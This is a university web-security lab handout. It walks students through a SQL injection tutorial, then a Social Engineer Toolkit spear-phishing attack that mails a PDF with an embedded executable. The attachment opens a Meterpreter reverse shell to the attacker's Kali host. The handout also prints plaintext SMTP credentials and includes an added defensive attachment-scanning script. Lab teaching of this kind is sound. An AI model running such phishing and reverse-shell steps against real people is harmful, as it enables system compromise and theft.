Module 6 Lab

Lab 6

Uploaded by

anilorak20082

Module 6: Lab Exercise

Launching Data Store and Social Engineering Attacks

MCY 670 Web Security

In this lab, you are required to complete an online tutorial on data store attacks, followed by the Social Engineering Toolkit on Kali.

Lab Report Submission Instructions


You are required to submit a lab report, which should include comments, descriptions, and explanations of each step that you
perform. You must also include a short write-up on each segment and on the necessity of each tool that you will be exploring in
this lab task. Include screenshots of each step that you complete along with the text in your lab report.

Submission requirements: Lab report

File format: MSWord or pdf (preferred)

Report requirements

• Include your name and lab title at the top of the report.
• Number the questions and answers and answer each question in your lab report in sequence.
• For each response, include the required text as well as all necessary and appropriate screenshots taken while performing the task. Crop
the screenshots as necessary so that the text in the images is properly visible.
o You may use the Snipping Tool on Windows to take screenshots from your PC, by clipping the area on the virtual machine
screen. If you are using a Mac PC, press and hold together: Shift, Command, and 4, to enable the selection cursor for
capturing screenshots.
• At the end of your report, write a brief reflection of the lab exercise
o What was the most valuable feature of the lab?
o What did you learn from this experience?
o Which concepts and terminology could you relate from the theoretical content to this lab experience?
o How did you prepare for this lab?
o What changes are you considering in preparing for your next lab?
• Use black font color for texts
• If uploading an MSWord format file, view the uploaded file from Canvas to make sure that the layout of images and texts are not
overlapping in the report. If the contents seem to have moved around, upload a pdf instead of an MSWord file.

Part 1: Online Tutorial on Data Store Attacks

You will complete a free-to-use online web-based tutorial tool on attacking data stores.

The report should include the following points for both the tutorials:

• The attacks and exploits performed on the web application.
• A short discussion on the reasons why the exploitation attempts were successful.
• The things which were done to fix the problems and remove the vulnerabilities.

Feel free to use screenshots to explain the above points in the report. However, please do not use a series of screenshots copied-
and-pasted in the report, without proper explanation. The explanations and discussions should be the primary content, and the
screenshots may be used for better illustration.

Tutorial: A Simple SQL Injection Attack


The tutorial is available at the following link: https://www.hacksplaining.com/exercises/sql-injection

Follow the tutorial through to the end.

Submit a screenshot of the final page when the tutorial is complete and you see the following message:

“Phew. Now we know how SQL INJECTION works, let’s learn how to protect against this kind of attack.”

Part 2: Launching a Social Engineering Attack

Social engineering attacks exploit human-human interaction, leading to the revelation of confidential digital information. The Social
Engineer Toolkit (SET) is an automated tool with integrated features for launching social engineering attacks through various
methods. Here, we will launch a social engineering attack leading to a compromised system.

Target: Windows VM

Phase A: Setting up the Target Windows VM


Check if your Windows VM has Firefox installed already. If so, then proceed directly to “Setting up a disposable web-based email
address from your Windows VM for the target victim user”. The Windows VM may come with an old version of Internet Explorer
which does not allow HTTPS. Hence, we have to work around the limitation to have Firefox installed on our Windows VM.

Downloading and placing the correct Firefox version in an accessible location on your Kali VM
• Log in to your Kali Linux VM and open the web browser application (use the Application menu on the top-left corner)
➢ Browse to the following URL: https://ftp.mozilla.org/pub/firefox/releases/43.0/win32/en-US/
➢ Download and save Firefox Setup 43.0.exe
➢ By default, the file will be saved in your /home/student/Downloads directory.
• Open a command line terminal and run the following commands
➢ cd /home/student/Downloads (browse to the directory where the file is downloaded)
➢ mv Firefox\ Setup\ 43.0.exe Firefox43.exe (rename the file for convenience)
➢ sudo cp Firefox43.exe /usr/share/doc/firefox-esr/ (copy the file to /usr/share/doc/firefox-esr)
• Next, we will install and run an open FTP server to allow us to transfer the file to the Windows VM
• Run the following commands from your command line terminal
➢ sudo apt-get install python3-pyftpdlib (install Python-based FTP server on Kali)
➢ python3 -m pyftpdlib (runs the FTP server)
➢ By default, the FTP server should start running on port 2121
➢ Do not close the command line terminal

Transferring Firefox from the Kali VM to the Windows VM


• Log in to your Windows VM and launch the WinSCP application from the Desktop with the following settings
➢ File protocol: FTP
➢ Encryption: No encryption
➢ Host name: Your_Kali_VM_IP
➢ Port number: 2121 (noted from the earlier step when the FTP server was launched on the Kali VM)
➢ Check-mark on “Anonymous Login” and click on “Login”
• Upon successful login, a new window will open with directory lists in two columns.
➢ Scroll down and find the firefox-esr directory in the right column
➢ Drag and drop Firefox43.exe from the right column to the left column
➢ The transfer is complete. You may now close the WinSCP window.
➢ You may also head back to your Kali VM and terminate the FTP server (command: ctrl+c)
• Go to Start > My Documents > Firefox43.exe and install the browser application

Setting up a disposable web-based email address from your Windows VM for the target victim user
• For this social engineering attack, we will use a disposable email address, which we will access from our Windows VM.
• Log in to your Windows VM and launch the Mozilla Firefox web browser from the Desktop
• Browse to the following URL: https://www.guerrillamail.com
• You may need to add the security exception for untrusted connection.
• The top-bar will display something similar as shown in this image:
• Click on the button with the random string, and you will be able to define an email ID yourself. Click on “set” when done.
• Use the drop-down to select a suitable email domain as per your preference.
• Your disposable email address is now set up (it will be referred to from this point on as the victim’s email address)
• Do not close the browser window.
• You may send an email from any account to your chosen disposable email address and verify it being received here.

Phase B: Launching a Social Engineering Attack
In this phase, we will send a phishing email from our Kali VM to our targeted victim user.

• Log in to your Kali VM and launch the Social Engineer Toolkit
➢ Click on the corner icon > Social Engineering Tools > Social Engineering Toolkit
• From the Social Engineering Toolkit command prompt, we will now proceed to design and launch our attack.
• Enter the number (1 – x) of each menu choice to make the following selections, one after another:
➢ Social-Engineering Attacks
➢ Spear-Phishing Attack Vectors
➢ Perform a Mass Email Attack
➢ Payload: Adobe PDF Embedded EXE Social Engineering (the payload will have an embedded executable)
➢ Use built-in BLANK PDF for attack
➢ Windows Meterpreter Reverse_TCP (we want to set up a Meterpreter session when the payload is executed)
• At this point, we have set up our attack module and payload. Next, we will enter the details for the crafted email.
➢ LHOST: Your_Kali_VM_IP
➢ Port to connect back on: 443 (this is the default port, you may use any other port of your choice)
• Wait for the payload to be created for the reverse TCP Meterpreter session
➢ Keep the filename (you may choose to set a customized filename)
➢ E-Mail Attack Single Email Address (we chose this as we know our target victim’s email)
➢ Pre-Defined Template
➢ Choose from the options for any of the provided templates (e.g. Status Report)
➢ Send email to: Put the victim email address set up earlier in Phase A
➢ Use your own server or open relay (an attacker may set up an online SMTP service for sending emails)
• For the purpose of this lab, I have created some test accounts.
➢ Free SMTP service provider: www.smtp2go.com
▪ Username: mcy670, Password: 485toor485
➢ Free email server provider: www.mail.com
▪ Username: [email protected], Password: 485toor485
• Use the details of the pre-configured SMTP service for the following information.
➢ From address: Put in the above email address ([email protected]) which the receiver is ‘expected’ to trust.
➢ From Name: Put in any name which the receiver is ‘expected’ to trust
➢ Username for open-relay: Enter the SMTP username from above which has already been set up for you.
➢ Password for open-relay: Enter the SMTP password from above which has already been set up for you.
▪ Note: Typed passwords on Linux systems are not visible
➢ SMTP server address: mail.smtp2go.com (specified by the free SMTP service provider)
➢ Port number for SMTP server: 2525 (specified by the free SMTP service provider)
➢ High priority: no
➢ TLS support: no
• The prompt will display that the email has been sent!
• Next, the attacker (you) will set up a listener and wait for the victim user to click on the email attachment, which will
eventually establish the Meterpreter session.
➢ Setup a listener: yes
▪ This will launch Metasploit automatically and start listening for a reverse TCP session from the victim.
▪ You will see a confirmation that a handler has started but no session was created.
• The attacker now just has to wait for the target victim to open the email and click on the email attachment by ‘accident’!

Phase C: Exploitation
At this point, we will ‘act’ as the victim user and ‘mistakenly’ click on the email attachment, which will eventually result in the
Meterpreter session being created.

• Log in to your Windows VM and view the Firefox browser window which you had running from before.
• Wait for the inbox to refresh or manually refresh the page till you receive the email which the attacker had sent.
➢ View the email and click on the attachment.
➢ You may be asked to save the file, so proceed with the file being saved.
➢ The prompt may warn that it consists of an executable. Ignore and click on Open.
• The victim will be shown a blank PDF file. However, the payload has already done its job!
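
Seen from the defender's side, an attachment like the one used in this lab can be flagged before a user ever opens it. The following is an added example, not part of the original lab handout: a Python check of the kind a mail gateway could run, which judges each attachment by its content rather than its filename and looks for the PDF names associated with embedded files and automatic actions. The sample message, its addresses and its filenames are constructed and inert.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# PDF name tokens tied to embedded files and automatic actions.
SUSPICIOUS = {
    "/EmbeddedFile": re.compile(rb"/EmbeddedFiles?\b"),
    "/Launch": re.compile(rb"/Launch\b"),
    "/OpenAction": re.compile(rb"/OpenAction\b"),
    "/JavaScript": re.compile(rb"/JavaScript\b"),
    "/JS": re.compile(rb"/JS\b"),
}
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalize_pdf_names(data: bytes) -> bytes:
    """Decode #xx name escapes so that /Lau#6Ech is seen as /Launch."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def scan_pdf(data: bytes) -> list[str]:
    """Return the suspicious names found; content that is not a PDF yields []."""
    if not data.lstrip().startswith(b"%PDF-"):
        return []
    norm = normalize_pdf_names(data)
    return [label for label, rx in SUSPICIOUS.items() if rx.search(norm)]

def scan_email(raw: bytes) -> dict[str, list[str]]:
    """Scan every attachment by content, ignoring filename and declared MIME type."""
    msg = message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        hits = scan_pdf(part.get_payload(decode=True) or b"")
        if hits:
            report[part.get_filename() or "(unnamed)"] = hits
    return report

def build_sample() -> bytes:
    """Constructed, inert message: PDF-like text carrying the markers, no payload."""
    flagged = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
               b"2 0 obj << /S /Lau#6Ech /F (placeholder) >> endobj\n"
               b"3 0 obj << /Type /EmbeddedFile >> endobj\n%%EOF\n")
    clean = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
    msg = EmailMessage()
    msg["Subject"], msg["From"], msg["To"] = "Status Report", "a@example.test", "b@example.test"
    msg.set_content("Please see the attached report.")
    msg.add_attachment(flagged, maintype="application", subtype="octet-stream", filename="report.bin")
    msg.add_attachment(clean, maintype="application", subtype="pdf", filename="notes.pdf")
    return msg.as_bytes()

if __name__ == "__main__":
    print(scan_email(build_sample()))
```

The flagged attachment is caught even though it is named report.bin and declared as application/octet-stream, because the check keys on the %PDF- header and the normalized name tokens.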

Next, on the other end, we know that the attacker is waiting with the Meterpreter session.

• Log back in to your Kali VM.
• Notice the prompt on the command line terminal
➢ Given the victim has opened the email attachment, the prompt on the attacker’s machine should say that a
Meterpreter session was opened.
• Start the session which was established with the following command:
➢ sessions -i 1
• The prompt will now change to meterpreter>
• At this point, the attacker has successfully exploited the target victim’s system.
• Recall from the previous lab the power of Meterpreter and how it could be used to further exploit the victim’s system.
➢ Refer to the previous lab on Meterpreter and run a few commands to gather information on the exploited system.
➢ Recall that in such cases, the attacker’s first instinct is to use the migration tool to quickly switch over to a more
stable process on the victim’s system.
• What do you think will happen if the attacker does not perform the migration?
